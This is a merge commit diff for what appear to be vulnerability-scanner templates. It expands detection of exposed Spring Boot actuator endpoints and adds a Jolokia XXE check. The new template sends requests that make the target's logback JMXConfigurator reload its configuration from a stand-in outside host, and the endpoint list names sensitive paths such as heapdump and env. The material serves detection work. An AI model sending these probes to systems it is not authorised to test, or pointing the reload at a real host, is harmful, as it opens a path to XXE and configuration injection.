Merge pull request #174 from dwisiswant0/development

Adding Spring Boot Actuators (Jolokia) XXE

security-misconfiguration/springboot-detect.yaml

@@ -2,38 +2,74 @@ id: springboot-actuators
 
 info:
   name: Detect the exposure of Springboot Actuators
-  author: that_juan_
+  author: that_juan_ & dwisiswant0
   severity: medium
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/trace"
-      - "{{BaseURL}}/loggers"
-      - "{{BaseURL}}/autoconfig"
-      - "{{BaseURL}}/threaddump"
-      - "{{BaseURL}}/env"
-      - "{{BaseURL}}/management"
-      - "{{BaseURL}}/dump"
-      - "{{BaseURL}}/configprops"
-      - "{{BaseURL}}/mappings"
-      - "{{BaseURL}}/auditevents"
-      - "{{BaseURL}}/beans"
-      - "{{BaseURL}}/cloudfoundryapplication"
-      - "{{BaseURL}}//jolokia"
       - "{{BaseURL}}/actuator"
       - "{{BaseURL}}/actuator/auditevents"
+      - "{{BaseURL}}/actuator/auditLog"
       - "{{BaseURL}}/actuator/beans"
-      - "{{BaseURL}}/actuator/health"
+      - "{{BaseURL}}/actuator/caches"
       - "{{BaseURL}}/actuator/conditions"
       - "{{BaseURL}}/actuator/configprops"
-      - "{{BaseURL}}/actuator/env"
+      - "{{BaseURL}}/actuator/configurationMetadata"
       - "{{BaseURL}}/actuator/dump"
-      - "{{BaseURL}}/actuator/threaddump"
+      - "{{BaseURL}}/actuator/env"
+      - "{{BaseURL}}/actuator/events"
+      - "{{BaseURL}}/actuator/exportRegisteredServices"
+      - "{{BaseURL}}/actuator/features"
       - "{{BaseURL}}/actuator/flyway"
+      - "{{BaseURL}}/actuator/health"
+      - "{{BaseURL}}/actuator/healthcheck"
+      - "{{BaseURL}}/actuator/heapdump"
+      - "{{BaseURL}}/actuator/httptrace"
+      - "{{BaseURL}}/actuator/hystrix.stream"
+      - "{{BaseURL}}/actuator/info"
       - "{{BaseURL}}/actuator/integrationgraph"
-      - "{{BaseURL}}//actuator/management"
+      - "{{BaseURL}}/actuator/jolokia"
-      - "{{BaseURL}}//actuator/jolokia"
+      - "{{BaseURL}}/actuator/liquibase"
+      - "{{BaseURL}}/actuator/logfile"
+      - "{{BaseURL}}/actuator/loggers"
+      - "{{BaseURL}}/actuator/loggingConfig"
+      - "{{BaseURL}}/actuator/management"
+      - "{{BaseURL}}/actuator/mappings"
+      - "{{BaseURL}}/actuator/metrics"
+      - "{{BaseURL}}/actuator/refresh"
+      - "{{BaseURL}}/actuator/registeredServices"
+      - "{{BaseURL}}/actuator/releaseAttributes"
+      - "{{BaseURL}}/actuator/resolveAttributes"
+      - "{{BaseURL}}/actuator/scheduledtasks"
+      - "{{BaseURL}}/actuator/sessions"
+      - "{{BaseURL}}/actuator/shutdown"
+      - "{{BaseURL}}/actuator/springWebflow"
+      - "{{BaseURL}}/actuator/sso"
+      - "{{BaseURL}}/actuator/ssoSessions"
+      - "{{BaseURL}}/actuator/statistics"
+      - "{{BaseURL}}/actuator/status"
+      - "{{BaseURL}}/actuator/threaddump"
+      - "{{BaseURL}}/actuator/trace"
+      - "{{BaseURL}}/auditevents"
+      - "{{BaseURL}}/autoconfig"
+      - "{{BaseURL}}/beans"
+      - "{{BaseURL}}/cloudfoundryapplication"
+      - "{{BaseURL}}/configprops"
+      - "{{BaseURL}}/dump"
+      - "{{BaseURL}}/env"
+      - "{{BaseURL}}/health"
+      - "{{BaseURL}}/heapdump"
+      - "{{BaseURL}}/hystrix.stream"
+      - "{{BaseURL}}/info"
+      - "{{BaseURL}}/jolokia"
+      - "{{BaseURL}}/jolokia/list"
+      - "{{BaseURL}}/loggers"
+      - "{{BaseURL}}/management"
+      - "{{BaseURL}}/mappings"
+      - "{{BaseURL}}/metrics"
+      - "{{BaseURL}}/threaddump"
+      - "{{BaseURL}}/trace"
     matchers:
       - type: regex
         part: body
@@ -44,6 +80,8 @@ requests:
           - "system"
           - "database"
           - "cron"
+          - "reloadByURL"
+          - "JMXConfigurator"
         condition: or
       - type: status
         status:

vulnerabilities/springboot-actuators-jolokia-xxe.yaml

@@ -0,0 +1,28 @@
+id: springboot-actuators-jolokia-xxe
+
+info:
+  name: Spring Boot Actuators (Jolokia) XXE
+  author: dwisiswant0
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
+      - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "http:\\/\\/nonexistent:31337\\/logback.xml"
+          - "reloadByURL"
+          - "JoranException"
+        condition: and
+        part: body
+      - type: word
+        words:
+          - "X-Application-Context"
+        part: header